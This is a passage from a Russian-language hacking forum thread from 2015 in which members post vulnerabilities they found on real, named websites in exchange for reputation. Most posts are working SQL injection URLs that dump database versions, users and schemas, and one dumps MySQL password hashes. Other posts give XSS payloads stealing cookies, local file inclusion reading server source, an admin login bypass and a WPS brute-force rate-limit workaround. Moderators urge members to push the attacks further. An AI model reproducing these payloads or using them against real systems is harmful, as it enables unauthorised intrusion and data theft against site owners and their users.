PDA

Просмотр полной версии : Уязвимости SQLi, XSS и другие.


Страницы : [1] 2

Егорыч+++
10.05.2015, 10:12
Эта тема только для публикации уязвимостей найденным вами лично. Любая честно найденная уязвимость прибавляет вам репутации. Тема исключительно для вновь прибывших.

Перед постом проверяйте, не выкладывалась ли уже найденная вами уязвимость. сделать это можно так:

Google:


site:antichat.ru ваш_сайт_с_уязвимостью.ру

Не забывайте, что необходимо написать эксплоит с выводом для SQLi, для XSS вывести alert(), для LFI прочитать /etc/passwd и т. п.


↑ (https://antichat.live/posts/3865352/)
Ребят, в целях обучения начинающих пентестеров грамотным определениям - ЖЕЛАТЕЛЬНО (если хотите плюсы) указывать полный тип найденной уязвимости - Blind SQL Injection, Reflected XSS, Arbitrary File Downloading и другие.

BabaDook
10.05.2015, 11:30
Два http://www.webbonus.net.ua/bitcoin-s.php?sait=-10'+/*!12345union*/+/*!12345select*/ 1,2,3,4,5,6,7,8,database/*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA*/(),10+--+ '-

Кстати , тут WAF и я заюзал технику буфер оверфлов П.С нигде я не нашёл на эту тему статей и очень мало мануалов про обход WAF итд .

BabaDook
10.05.2015, 11:37
Три lfi

http://greyslon.ru/index.php

post

action=register

&ajax=true

&data=login%3De%26email%3De%26pass%3De%26repass%3De %26payeer%3De%26captcha%3De

&page=../info

Ещё это http://greyslon.ru/htaccess Не знаю уязвимость это или нет чтение этого файла

BabaDook
10.05.2015, 12:49
bidderland.co.in/siteadmi (https://vk.com/away.php?to=http%3A%2F%2Fbidderland.co.in%2Fsitead min%2Flogin.php)n

Эта уязвимость эксплуатируется за 5 секунд.

нашёл не я , но она очень интересная, не типичная. Кто догнал прошу оставить это в секрете.

WallHack
10.05.2015, 20:16
↑ (https://antichat.live/posts/3845281/)
Первая SQL
http://www.c2-int.com/news-full.php?id=1278' (http://www.c2-int.com/news-full.php?id=1278%27)


А что не раскрутил ?


http://www.c2-int.com/news-full.php?id=-1278+union+select+1,2,3,version(),5,6,7,8,9,10,11, 12,13,14+--+

Версия: 5.5.43-37.2

User: c2deuts_ice@localhost

-----------------------------


Вторая XSS


Зачем делать несколько постов можно в одном все выложить

BigBear
10.05.2015, 20:39
↑ (https://antichat.live/posts/3845293/)
Просто прямо сейчас ищу )) Как нахожу выкладываю!


Раскручивайте уязвимости. Пытайтесь придумать вектор атаки. Мы вас не для этого отбираем, чтобы вы просто умели что-то искать.

frank
10.05.2015, 21:02
http://www.asep7.gov.la/show.php?id=15%27+and+12=16+union+select+1,2,3,4,v ersion%28%29,6,7,8,9,10,11,12+--+

5.5.40-0ubuntu0.12.04.1 - вывод в заголовке


http://www.minddesign.co.uk/show.php?id=483%27+and+34=-2+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11 ,12,13,14,15,16+--+

5.6.23


http://www.psych-it.com.au/Psychlopedia/article.asp?id=277+AND+568=-3+union+select+1,concat%28username,0x3a,pass%29,3, 4,5,6+from+users+limit+10,1+--+

4.1.18-nt

frank
10.05.2015, 23:25
http://www.damico.co.za/staff_profile.asp?STAFF_ID=3+and+12=0+union+select +1,user%28%29,database%28%29,version%28%29,5+--+

idserver_damico@winwebs03.cpt.wa.co.za (mailto:idserver_damico@winwebs03.cpt.wa.co.za)

idserver_damicodb

5.5.42-cll

Mister_Bert0ni
11.05.2015, 00:51
http://goo.gl/imjzsb (http://vk.com/away.php?to=http%3A%2F%2Fgoo.gl%2Fimjzsb&post=-92282941_46)

http://goo.gl/8IKVeV (http://vk.com/away.php?to=http%3A%2F%2Fgoo.gl%2F8IKVeV&post=-85727471_3239)

http://goo.gl/wYRBLz

http://emofans.ru/gallery/emowallp/

POST_DATA:

foto_msort=&foto_sort=null and ++POLYGON((select*from(select*from(select+concat(0 x7e7e496e6a6563746564204279204d69737465725f4265727 4306e697e7e,0x203a3a204461746162617365203a3a ,database(),0x202056657273696f6e203a3a20,version() )e)f)x)) -- - (http://vk.com/away.php?to=http%3A%2F%2Fgoo.gl%2FwYRBLz&post=-85727471_3239)

https://www.choosewellness.com.ph/campus-vote_video-entry.php?id=5 and(select!x-~0.+from(select(select+group_concat(0x3c7370616e20 7374796c653d22666f6e742d66616d696c793a4963656c616e 643b636f6c6f723a7265643b73697a653a353b746578742d73 6861646f773a23303030203070782030707820337078223e4d 69737465725f42657274306e693c62723e,0x4461746162617 365203a3a202020,DATABASE(),0x3c62723e506f727420203 a3a2020,@@PORT,0x3c62723e46696c6573797374656d203a3 a2020,@@VERSION_COMPILE_OS,0x20203a3a2020,@@VERSIO N_COMPILE_MACHINE,0x3c62723e56657273696f6e206f6620 4461746162617365203a3a2020,version(),0xa3c62723e48 6f73746e616d65203a3a20,@@HOSTNAME,0x3c2f7370616e3e ))x)x)

Mister_Bert0ni
11.05.2015, 00:55
Демонстрация SQLi от меня

Mister_Bert0ni
11.05.2015, 00:56
Демонстрация SQLi от меня

Mister_Bert0ni
11.05.2015, 01:00
SQLi на сайте bitbank

Mister_Bert0ni
11.05.2015, 01:01
↑ (https://antichat.live/posts/3845075/)
bidderland.co.in/siteadmi (https://vk.com/away.php?to=http%3A%2F%2Fbidderland.co.in%2Fsitead min%2Flogin.php)
n
Эта уязвимость эксплуатируется за 5 секунд.
нашёл не я , но она очень интересная, не типичная. Кто догнал прошу оставить это в секрете.


Да да 5 сек даже много)))

rezistor
11.05.2015, 08:49
Внесу и я свои первые 5 копеек

http://www.leong-leong.com/press.ph...,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29 -- (http://www.leong-leong.com/press.php?id=-68%20union%20select%201,user%28%29,database%28%29, version%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29%20--)

Arboretum
11.05.2015, 09:15
http://java.lordy.ru/

Есть жаба игра, зарегавшись, в чате можно написать ">alert(XSS)", после этого на java.lordy.ru высветится XSS.

frank
11.05.2015, 16:24
http://www.jhewlett.com/content/humor.php?id=10%27+and+1=-0+union+select+user%28%29,group_concat%28database% 28%29,0x3a,version%28%29%29+--+

jhewlett_r@209.68.5.201

jhewlett_prod:5.0.96-log


http://nightgallery.ca/event.php?id=91+or+1+group%20by%20concat_ws%280x2a ,version%28%29,user%28%29,database%28%29,floor%28r and%280%29*2%29%29%20having%20min%280%29%20or%201--+

5.0.96-log

nightgallery20@72.167.232.44

nightgallery20


http://www.australianpaddlesurfer.com.au/review.php?id=113+or+2+group%20by%20concat_ws%280x 2f,version%28%29,user%28%29,database%28%29,floor%2 8rand%280%29*2%29%29%20having%20min%280%29%20or%20 1--+

10.0.17-MariaDB-cll-lve

austral3_casso@server-2h-r34.ipv (mailto:austral3_casso@server-2h-r34.ipv)4.au.syr


http://www.novagora.net/rub.php?Rub=0&IDR=5+and+2=0+union+select+1,2,concat_ws%280x3a,ve rsion%28%29,database%28%29,user%28%29%29,4,5+--+

4.0.26-standard-log

novagoraTest

novagoraTest@10.0.5.18

Zen1T21
11.05.2015, 16:53
↑ (https://antichat.live/posts/3845700/)
http://www.girlplays.ru/view_search.php
уязвимость в поисковике, пока что не крутил.
пост данные
search=&submit_s=


search=') union select 1,concat(User,Password),3,4,5,6,7 from mysql.user#&submit_s=

root*B7C246CBBD3D468E80CB40AD57BA8BAFFEEB62BC
(http://www.girlplays.ru/view_game.php?id=1)debian-sys-maint*E639A7C638862F6392314324D1E7537900655649

adelina*21A61A920952BE6489C905AA3836F552D4A1C631 (http://www.girlplays.ru/view_game.php?id=1)

tiger_x
11.05.2015, 19:44
http://www.oar.org.ro/press.php?id=-1%20union%20all%20select%20null,null,null,version% 28%29,null,null%20--

Версия: 5.6.23

User: oarorgro_oar@localhost

rezistor
11.05.2015, 19:54
XSS

http://gov.cap.ru/?__VIEWSTATE=/wEPDwUKLTczMDc3ODY5Nw9kFgJmD2QWAgIDD2QWEgIBD2QWAgI BD2QWAgIBDxYCHgRUZXh0BXLQp9GD0LLQsNGI0YHQutCw0Y8g0 YDQtdGB0L/Rg9Cx0LvQuNC60LAgPGRpdj7QntGE0LjRhtC40LDQu9GM0L3Ri 9C5INC/0L7RgNGC0LDQuyDQvtGA0LPQsNC90L7QsiDQstC70LDRgdGC0L g8L2Rpdj5kAgMPZBYOAgEPDxYCHgdWaXNpYmxlaGRkAgMPDxYC HwFoZBYCZg8PFgIeC05hdmlnYXRlVXJsBTpodHRwOi8vZ292Lm NhcC5ydS9Pcmdhbml6YXRpb24uYXNweD9nb3ZfaWQ9NDkmdW5p dD1jb250YWN0ZGQCBQ8PFgIfAWhkFgJmDw8WAh8CBSpodHRwOi 8vZ292LmNhcC5ydS9TdHJ1Y3R1cmUuYXNweD9nb3ZfaWQ9NDlk ZAIJDw8WAh8BZ2QWAmYPFgIeBGhyZWYFMmh0dHA6Ly9nb3YuY2 FwLnJ1L1NpdGVNYXAuYXNweD9pZD0zNjU0NzcmZ292X2lkPTQ5 ZAILDw8WAh8CBShodHRwOi8vZ292LmNhcC5ydS9TaXRlTWFwLm FzcHg/Z292X2lkPTQ5ZGQCDQ8PFgIfAgUtaHR0cDovL2dvdi5jYXAucn Uvc3BlYy9EZWZhdWx0LmFzcHg/Z292X2lkPTQ5ZGQCDw8PFgIfAgUmaHR0cDovL2dvdi5jYXAucn UvcnNzLz9nb3ZfaWQ9NDkmaWQ9NDlkZAIHD2QWBgIDDw8WAh8B Z2RkAgUPDxYCHwFnZGQCFQ8PFgIfAWdkZAINDw8WAh8BZ2RkAh EPDxYCHwFoZGQCEw9kFhoCAQ9kFgICAQ8PFgIfAgUcaW5mby5h c3B4P2dvdl9pZD00OSZ0eXBlPXRvcGRkAgMPZBYCAgEPDxYCHw IFHWluZm8uYXNweD9nb3ZfaWQ9NDkmdHlwZT1tYWluZGQCBQ9k FgICAQ8PFgIfAgUdaW5mby5hc3B4P2dvdl9pZD00OSZ0eXBlPW 5ld3NkZAIHDw8WAh8BaGRkAgkPZBYCAgEPDxYCHwIFFHZpZGVv LmFzcHg/Z292X2lkPTQ5ZGQCCw8PFgIfAWhkZAINDw8WAh8BaGQWAgIBDw 8WAh8CBRdjYWxlbmRhci5hc3B4P2dvdl9pZD00OWRkAg8PZBYC AgEPDxYCHwIFGlB1YmxpY2F0aW9uLmFzcHg/Z292X2lkPTQ5ZGQCEQ9kFgICAQ8PFgIfAgUYTWVtb3JpYWxzLm FzcHg/Z292X2lkPTQ5ZGQCEw8PFgIfAWhkZAIVD2QWAgIBDw8WAh8CBR NsYXdzLmFzcHg/Z292X2lkPTQ5ZGQCFw8PFgIfAWhkZAIZDw8WAh8BaGRkAhUPDx YCHwFoZGQCFw8PFgIfAWdkZAIbD2QWAgIBDw8WAh8CBSZPcmdz LmFzcHg/Z292X2lkPTQ5JmlkPTQ5JnVuaXQ9Y29udGFjdGRkZP3Mf6N7AL xvhcyia+88BzPuA4FLR9eN77dXGFDCRBD/&ctl00$Search1$BtnSearch=&__VIEWSTATEGENERATOR=CA0B0334&ctl00$Search1$TextSearch=античатalert()&__EVENTVALIDATION=/wEWBwK1y/X1DALNk6LCAwKbnsfFCAK8lLmCCQLC9M+dCwKC1JS2BwKjz9/DAXkyh+c6G8rMsfjzrV2Wjy6zi7nnNfiqJHMfqPO+S6mI&ctl00$Comments=античат&ctl00$ErrorText= (http://gov.cap.ru/?__VIEWSTATE=%2fwEPDwUKLTczMDc3ODY5Nw9kFgJmD2QWAgI DD2QWEgIBD2QWAgIBD2QWAgIBDxYCHgRUZXh0BXLQp9GD0LLQs NGI0YHQutCw0Y8g0YDQtdGB0L%2fRg9Cx0LvQuNC60LAgPGRpd j7QntGE0LjRhtC40LDQu9GM0L3Ri9C5INC%2f0L7RgNGC0LDQu yDQvtGA0LPQsNC90L7QsiDQstC70LDRgdGC0Lg8L2Rpdj5kAgM PZBYOAgEPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHwFoZBYCZg8PF gIeC05hdmlnYXRlVXJsBTpodHRwOi8vZ292LmNhcC5ydS9Pcmd hbml6YXRpb24uYXNweD9nb3ZfaWQ9NDkmdW5pdD1jb250YWN0Z GQCBQ8PFgIfAWhkFgJmDw8WAh8CBSpodHRwOi8vZ292LmNhcC5 ydS9TdHJ1Y3R1cmUuYXNweD9nb3ZfaWQ9NDlkZAIJDw8WAh8BZ 2QWAmYPFgIeBGhyZWYFMmh0dHA6Ly9nb3YuY2FwLnJ1L1NpdGV NYXAuYXNweD9pZD0zNjU0NzcmZ292X2lkPTQ5ZAILDw8WAh8CB ShodHRwOi8vZ292LmNhcC5ydS9TaXRlTWFwLmFzcHg%2fZ292X 2lkPTQ5ZGQCDQ8PFgIfAgUtaHR0cDovL2dvdi5jYXAucnUvc3B lYy9EZWZhdWx0LmFzcHg%2fZ292X2lkPTQ5ZGQCDw8PFgIfAgU maHR0cDovL2dvdi5jYXAucnUvcnNzLz9nb3ZfaWQ9NDkmaWQ9N DlkZAIHD2QWBgIDDw8WAh8BZ2RkAgUPDxYCHwFnZGQCFQ8PFgI fAWdkZAINDw8WAh8BZ2RkAhEPDxYCHwFoZGQCEw9kFhoCAQ9kF gICAQ8PFgIfAgUcaW5mby5hc3B4P2dvdl9pZD00OSZ0eXBlPXR vcGRkAgMPZBYCAgEPDxYCHwIFHWluZm8uYXNweD9nb3ZfaWQ9N DkmdHlwZT1tYWluZGQCBQ9kFgICAQ8PFgIfAgUdaW5mby5hc3B 4P2dvdl9pZD00OSZ0eXBlPW5ld3NkZAIHDw8WAh8BaGRkAgkPZ BYCAgEPDxYCHwIFFHZpZGVvLmFzcHg%2fZ292X2lkPTQ5ZGQCC w8PFgIfAWhkZAINDw8WAh8BaGQWAgIBDw8WAh8CBRdjYWxlbmR hci5hc3B4P2dvdl9pZD00OWRkAg8PZBYCAgEPDxYCHwIFGlB1Y mxpY2F0aW9uLmFzcHg%2fZ292X2lkPTQ5ZGQCEQ9kFgICAQ8PF gIfAgUYTWVtb3JpYWxzLmFzcHg%2fZ292X2lkPTQ5ZGQCEw8PF gIfAWhkZAIVD2QWAgIBDw8WAh8CBRNsYXdzLmFzcHg%2fZ292X 2lkPTQ5ZGQCFw8PFgIfAWhkZAIZDw8WAh8BaGRkAhUPDxYCHwF oZGQCFw8PFgIfAWdkZAIbD2QWAgIBDw8WAh8CBSZPcmdzLmFzc Hg%2fZ292X2lkPTQ5JmlkPTQ5JnVuaXQ9Y29udGFjdGRkZP3Mf 6N7ALxvhcyia%2b88BzPuA4FLR9eN77dXGFDCRBD%2f&ctl00%24Search1%24BtnSearch=&__VIEWSTATEGENERATOR=CA0B0334&ctl00%24Search1%24TextSearch=античатalert()&__EVENTVALIDATION=%2fwEWBwK1y%2fX1DALNk6LCAwKbnsfF CAK8lLmCCQLC9M%2bdCwKC1JS2BwKjz9%2fDAXkyh%2bc6G8rM sfjzrV2Wjy6zi7nnNfiqJHMfqPO%2bS6mI&ctl00%24Comments=античат&ctl00%24ErrorText=)

Mister_Bert0ni
12.05.2015, 00:54
http://goo.gl/uMgvlO


http://www.perio.com.ua/articles.php?id=.13 and @b:=current_user()+/*!50000UNIoN+Select*/+1,concat/*_*/(0x3c7370616e207374796c653d22666f6e742d66616d696c7 93a4963656c616e643b636f6c6f723a7265643b73697a653a3 53b746578742d736861646f773a23303030203070782030707 820337078223e4d69737465725f42657274306e693c62723e, 0x4461746162617365203a3a202020,DATABASE/**_**/(),0x3c62723e506f727420203a3a2020,@@port,0x3c62723 e43757272656e745f55736572203a3a202020203a3a ,@b,0x3c62723e56657273696f6e206f662044617461626173 65203a3a2020,VERSION(),0xa3c62723e486f73746e616d65 203a3a20,0x3c2f7370616e3e,@@HOSTNAME),3,1337,5,6 -- -

Может кто знает как здесь WAF на information_schema обойти?

Mister_Bert0ni
12.05.2015, 14:29
↑ (https://antichat.live/posts/3846203/)
Да и в ближайщее время тут всякие конкурсы, на которых будет возможность проявить себя.


Для этого будет создан отдельный раздел?Где они будут постится?

BabaDook
12.05.2015, 14:33
↑ (https://antichat.live/posts/3846206/)
Для этого будет создан отдельный раздел?Где они будут постится?


Да, тут есть конкурс на безопасность ОС, итд Это + к репе

Я стану первым кто сделает это

И так мой исследование и авторство

Надеюсь маленькие глупенькие не увидят

И так расскажу как можно обойти

WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking при взломе wi-fi

Всё очень просто

-T, --m57-timeout=

-d, --delay=

-t, --timeout=

команда примет такой вид

reaver -i mon0 -b 00;11;11;11;11;11 -c 12 -vv -m57-timeout=20 --delay=20 --timeout=20

советую в комплексе использовать очень важная команда --delay. Остальные для успокоение души.

п.с советую начать не с 20, а с 50 или 100

читайте мануалы к программам, вот что я вам скажу

Mister_Bert0ni
12.05.2015, 15:16
↑ (https://antichat.live/posts/3846208/)
Да, тут есть конкурс на безопасность ОС, итд Это + к репе
Я стану первым кто сделает это
И так мой исследование и авторство
Надеюсь маленькие глупенькие не увидят
И так расскажу как можно обойти
WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking при взломе wi-fi
Всё очень просто
-T, --m57-timeout=
-d, --delay=
-t, --timeout=
команда примет такой вид
reaver -i mon0 -b 00;11;11;11;11;11 -c 12 -vv -m57-timeout=20 --delay=20 --timeout=20
советую в комплексе использовать очень важная команда --delay. Остальные для успокоение души.
п.с советую начать не с 20, а с 50 или 100
читайте мануалы к программам, вот что я вам скажу


Не на всех роутерах delay помогает))) TP-Link-и часто в лок уходят после 10 неправильных попыток ввода пина с одного мак-адреса и delay там все равно)

tiger_x
12.05.2015, 20:25
http://www.towcar.info/read.php?id=-1%20union%20all%20select%20null,null,null,concat%2 8version%28%29,0x4c7,user%28%29%29,null,null,null, null,null,null--

Версия:4.1.21-standard

User:ctrekker@localhost

Егорыч+++
12.05.2015, 20:39
↑ (https://antichat.live/posts/3846394/)

http://www.towcar.info/read.php?id=-1%20union%20all%20select%20null,null,null,concat%2 8version%28%29,0x4c7,user%28%29%29,null,null,null, null,null,null--

Версия:4.1.21-standard
User:ctrekker@localhost


Это какой то сверх дырявый сайт и причем очень давно.

tiger_x
12.05.2015, 20:44
↑ (https://antichat.live/posts/3846399/)
Это какой то сверх дырявый сайт и причем очень давно.


А этот пойдет?


http://www.sourceisrael.com/read.php?id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT%28vers ion%28%29,0x4c7,user%28%29%29,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL--

BabaDook
13.05.2015, 02:53
http://m.deffki.su/?go=

по моему lfi но я не могу раскрутить, если кто подскажет буду признателен

YaBtr
13.05.2015, 10:17
↑ (https://antichat.live/posts/3846603/)

http://m.deffki.su/?go=

по моему lfi но я не могу раскрутить, если кто подскажет буду признателен


Набранное количество баллов позволяет Вам задавать вопросы по уязвимостям в профильном разделе форума.

По поводу вопроса - небольшая подсказка:

http://m.deffki.su/?go=php://filter/convert.base64-encode/resource=index


dir=$root_path.'/templates/';
$tpl->load_template('main.tpl');
$go=$_GET[go];

if ($go=="prv")
{
header("Location:$site_url/prv.php?id=$_GET[id]");
}

elseif (!empty($go))
{
include"$go.php
";
$indek_1=$indek;
}

else
{
include"main.php";
}
if (empty($descr))
{
$descr="Ýðîòèêà - ýòî òàëàíò êðàñèâî ñ ñåê ñóàëüíî ïîêàçàòü æåíñêîå òåëî. Ñ äðóãîé ñòîðîíû, ëþ áûå ÷àñòíûå ýðî ôîòî òàê æå ìîæíî íàçâàòü ýðîòèêîé . Îáû÷íûå ãîëûå äåâóøêè í äîìàøíèõ ôîòîãðàôèÿõ ýò ïðîñòî ýðîòèêà, à êðàñèâ î ïîêàçàííûå ãîëûå äåâî÷ê è ýòî óæå êðàñèâàÿ, ïðîôå ñèîíàëüíàÿ ýðîòèêà. Íà íà øåì ñàéòå âû åæåäíåâíî ìî æåòå íàáëþäàòü è òî è äðó ãîå (áåñïëàòíî) - ëþáèòåëüñêèå ôîòî ãîëûõ áàá è ïðîôåññèîíàëüíûå ôî òîãðàôèè ãîëûõ òåëîê ìîäå ëåé. Çàõîäèòå ÊÀÆÄÛÉ ÄÅÍÜ è íàñëàæäàéòåñü ñåêñóàëü ûìè ôîòî ãîëûõ æåíùèí îí àéí!";
}
else
{
$descr="$descr";
}
$tpl->set('{main}',$main);
$tpl->set('{title}',$title);
$tpl->set('{indek}',$indek);
$tpl->set('{indek_1}',$indek_1);
$tpl->set('{descr}',$descr);
$tpl->compile('main');
echo$tpl->result['main'];
?>

tiger_x
13.05.2015, 18:31
http://www.coon-coon.com/ViewPhoto.php?Id=9%27%20and%20%28select%201%20from %28select%20count%28*%29,concat%280x56657273696F6E 3A3A,version%28%29,0x557365723A3A0D0A,user%28%29,f loor%28rand%280%29*2%29%29x%20from%20information_s chema.character_sets%20group%20by%20x%29a%29--%27

Version::5.5.40-0ubuntu0.12.04.1

User:: c31cooncooncom@localhost

Егорыч+++
13.05.2015, 21:17
↑ (https://antichat.live/posts/3846921/)
очень простая sql

http://www.radiotec.ru/catalog.php?cat=jr1&art=-11329+union+select 1.2,3,user(),database(),6,vers ion(),8,9,10,11,12,13,14,15,16,17,18,19+--+ -



/threads/21336/page-663#post-2395458 (https://antichat.live/threads/21336/page-663/)

/threads/21336/page-607#post-2158662 (https://antichat.live/threads/21336/page-607/)

tiger_x
13.05.2015, 21:23
http://www.sporte-leisure.com.au/info.php?id=-1%27%20union%20all%20select%20null,concat%280x7469 6765725F783C62723E3C62723E,0x56657273696F6E3A3A20, version%28%29,0x3C62723E557365723A3A20,user%28%29% 29,null,null,null,null--%27

Version:: 5.1.48-community

User:: root@localhost

faza02
14.05.2015, 01:44
перед постом проверяйте, не выкладывалась ли уже найденная вами уязвимость. сделать это можно так:

Google: site:antichat.ru вашсайтсуязвимостью.ру

Rebz
14.05.2015, 18:49
Господа, требуется написать некий пример, эксплоит с выводом.. а не поле = VULNERABLE и ковычка у параметра.

MaxFast
14.05.2015, 19:11
↑ (https://antichat.live/posts/3847285/)
1) SQL-inj
http://amphora.ru/books.php?pageit= (https://vk.com/away.php?to=http%3A%2F%2Famphora.ru%2Fbooks.php%3F pageit%3D10)
VULNERABLE




http://amphora.ru/books.php?pageit=10+procedure+analyse+(extractvalu e(1,concat(0x3a,version())),1)--

XPATH syntax error: ':5.5.35-1+wheezy1+mh1-log'

tiger_x
14.05.2015, 19:25
http://www.pidsphil.org/journal.php?id=40%20UNION%20ALL%20SELECT%20NULL,NU LL,CONCAT%280x74696765725F783C62723E3C62723E,0x566 57273696F6E3A3A20,version%28%29,0x3C62723E55736572 3A3A20,user%28%29%29,NULL,NULL,NULL,NULL,NULL,NULL ,NULL--

Version:: 5.5.32-log

User:: pidsphil_user1@10.20.112.231

BabaDook
14.05.2015, 21:52
Не очень я люблю xss


http://tab.dp.ua/catalog.php?sword=%3c%73%63%72%69%70%74%3e%61%6c%6 5%72%74%28%31%32%33%29%3b%3c%2f%73%63%72%69%70%74% 3e

Ну так же ради юмора


http://tab.dp.ua/catalog.php?sword=%3c%68%31%3e%48%45%4c%4c%4f%3c%2 f%68%31%3e

нашёл случайно в попытках вставить php код.

Там ещё sql есть

Mister_Bert0ni
15.05.2015, 00:19
3) SQL-inj
http://www.imevents.ru/events.php?id= (http://www.imevents.ru/events.php?id=999999.9%20union%20all%20select%201, 2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,999,26,27,28,29--)
VULNERABLE



[HTML]
...
...
,,subscribers,is_active,,temp_keys,session_id,,tem p_keys,code,,temp_keys,date,,users,id,,users,user_ pass,,users,email,,users,name,,users,company,,user s,activity,,users,position,,users,phone,,users,reg time,,users,last_visit_time,,users,last_ip,,users, code,,users,is_blocked,,users,is_active,,users,sub scribe,,users_sessions,session_id,,users_sessions, unid,,users_sessions,created_time,,year,id">

tiger_x
15.05.2015, 11:20
http://www.muziekhuis.nl/details.php?id=-1%20union%20all%20select%20NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat%280x3C 62723E54494745525F583C62723E,0x56657273696F6E3A3A2 0,version%28%29,0x3C62723E557365723A3A20,user%28%2 9%29,NULL,NULL,NULL,NULL,NULL

Version:: 5.5.43-0+deb7u1

User:: muzhuis_qbusa@194.109.22.94

Mister_Bert0ni
16.05.2015, 01:46
http://s7.hostingkartinok.com/uploads/images/2015/05/8be2623fe570f979db6aa734529f4ab7.png

Шниперсон
16.05.2015, 12:36
Мои 5 копеек

http://www.podarochek .by/about?curCategory=10&curItem=-666+union+select+1,3,user%28%29,5,6,7,8,9,10

Mister_Bert0ni
16.05.2015, 14:11
↑ (https://antichat.live/posts/3847967/)
1. В сообщении нет ссылки. Не видно уязвимых параметров и вектора атаки. Если перейти по редиректу, ссылка будет видна в адресной строке, но разные браузеры могут отображать некоторые символы по-своему.
2. Cсылка на эту тему передается в реферере. Возможные проблемы для форума.
3. IP-адреса тех, кто перешел по ссылке, сохраняются в логах сервера. Возможные проблемы для юзеров.
4. Рядом со своим ником советую указывать адрес, телефон и паспортные данные. Это же круто.


Понял.Спасибо за наставление.

BabaDook
16.05.2015, 23:34
Вот нашёл немного, но раскрутить не могу. если кто подскажет как такие раскручивать, тогда, того поцелует сама Моника


http://amurchik.com.ua/catalog/dlya-nee/?block=1&filters=&sortBy=1

http://www.eroticland.kh.ua/index.php?nav_id=1

frank
17.05.2015, 00:24
↑ (https://antichat.live/posts/3848263/)
Вот нашёл немного, но раскрутить не могу. если кто подскажет как такие раскручивать, тогда, того поцелует сама Моника

http://amurchik.com.ua/catalog/dlya-nee/?block=1&filters=&sortBy=1

http://www.eroticland.kh.ua/index.php?nav_id=1





http://www.eroticland.kh.ua/index.php?nav_id=-1%27+and+456=78+union+select+1,2,3,version%28%29,5 ,6+--+

5.1.73 вывод в title

BabaDook
17.05.2015, 01:57
http://sex.pics-land.ru/admin/



логин admin' or 1=1#

R3hab
17.05.2015, 18:52
http://www.futurefarmers.com/playshop/PJ1.php?id=-3%20union%20select%201,2,3,version(),5,6,7,8,9,10, 11,12,13,14

ТИЦ20 PR5

5.1.72-rel14.10

frank
18.05.2015, 15:12
↑ (https://antichat.live/posts/3848263/)
Вот нашёл немного, но раскрутить не могу. если кто подскажет как такие раскручивать, тогда, того поцелует сама Моника

http://amurchik.com.ua/catalog/dlya-nee/?block=1&filters=&sortBy=1

http://www.eroticland.kh.ua/index.php?nav_id=1



Ковырял тот что ты первый в списке вылазил, все хотел хотя бы ксс какой-нить попробовать засунуть, в итоге ничего толкового не вышло Получилось только вот такое, веселья для или как смотреть запрещенные сайты в обход корпоротивной прокси


http://amurchik.com.ua/search/?q=%3Ciframe+src%3D%22http%3A%2F%2Fmicrosoft.com%2 2%3E%3C%2Fiframe%3E

Filipp
18.05.2015, 16:11
XSS: http://yarmakmusic.com/admin/index.php/">alert(document.cookie)

Babadyc
18.05.2015, 21:05
http://www.canaaninthedesert.com/ca...ame),3,4,5,6+from+information_schema.tables-- (http://www.canaaninthedesert.com/catalog_show.php?x=-1+union+select+1,group_concat(table_name),3,4,5,6+ from+information_schema.tables--)

Filipp
18.05.2015, 21:24
LFI: http://www.sex-park.ch/?load=preise../../index

// faza02: http://www.sex-park.ch/?load=php://filter/convert.base64-encode/resource=index

BabaDook
18.05.2015, 23:54
http://english.fortline.ru/page.php?id=87'+and+false+union+select 1,version(),3,3,4+--+ -


http://www.mmpris.ru/products.php?rid=2&id=99+And+1=2+union+select 1,database(),user()#

BabaDook
19.05.2015, 00:41
http://itccst.ru/news_view.php?id=19'+and+false+/*!12345%55%6e%69%4f%4e*/+/*!12345%73%65%6c%65%63%74*/2,user(),3,database(),5+'1#



http://www.matrot.ru/index.php?langue=2&page=M41H'+and+false+union+select 1,2,3,4,5/**/'1

что-то я догнать не могу, где вывод ((


http://www.keramir-iv.ru/discr.php?id=3'+and+false+union+select 1,database (),3,4,4,4,4,4,5,5,6,7,8,7,7,6,5,4,4,7/**/'1#

этот error-base?

//можно крутить и как error и как union


http://diagnostika-plus.ru/index.php?page=dcatalog99'+%75%4e%49%4f%6e+%53%45% 4c%65%63%74 1,2,database(),4,5/**/'1#



http://www.spectehsnab.ru/index1.php?id=2+and+false+union+select+concat((sel ect (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where
(table_schema!=0x696e666f726d6174696f6e5f736368656 d61) and (@a)in(@a:=concat(@a,0x3c6c693e,table _schema,
0x203a3a20,table_name,0x203a3a20,column_name,0x3c6 2723e))))a))#



http://www.limo-pro.ru/services.php?id=34+union+select 1,version(),{f d atabase()},4,5,user(),7,8#

Спасибо парню, за статью))

Господа, я потом обединю в один пост , не ругайтесь

Mister_Bert0ni
19.05.2015, 13:47
http://bluegrassmidwest.com/details.php?id=.18%00' ++UNION+ALL+SELECT+1,concat(0x3c666f6e742073697a65 3d22352220636f6c6f723d2272656422203e7e7e496e6a6563 746564204279204d69737465725f42657274306e697e7e3c68 723e,0x4461746142617365203a3a,database(),0x3c62723 e56457273696f4e203a3a,version(),
0x3c62723e557365723a3a,user(),0x3c68723e3c2f666f6e 743e,make_set(6,@:=0x0a,(select(1)from(information _schema.columns)where@:=make_set(511,@,0x3c6c693e, table_name,column_name)),@)),3,4,5,6,7,8,9,10,11-- -

tiger_x
19.05.2015, 19:18
↑ (https://antichat.live/posts/3849163/)

http://www.matrot.ru/index.php?langue=2&page=M41H'+and+false+union+select 1,2,3,4,5/**/'1

что-то я догнать не могу, где вывод ((




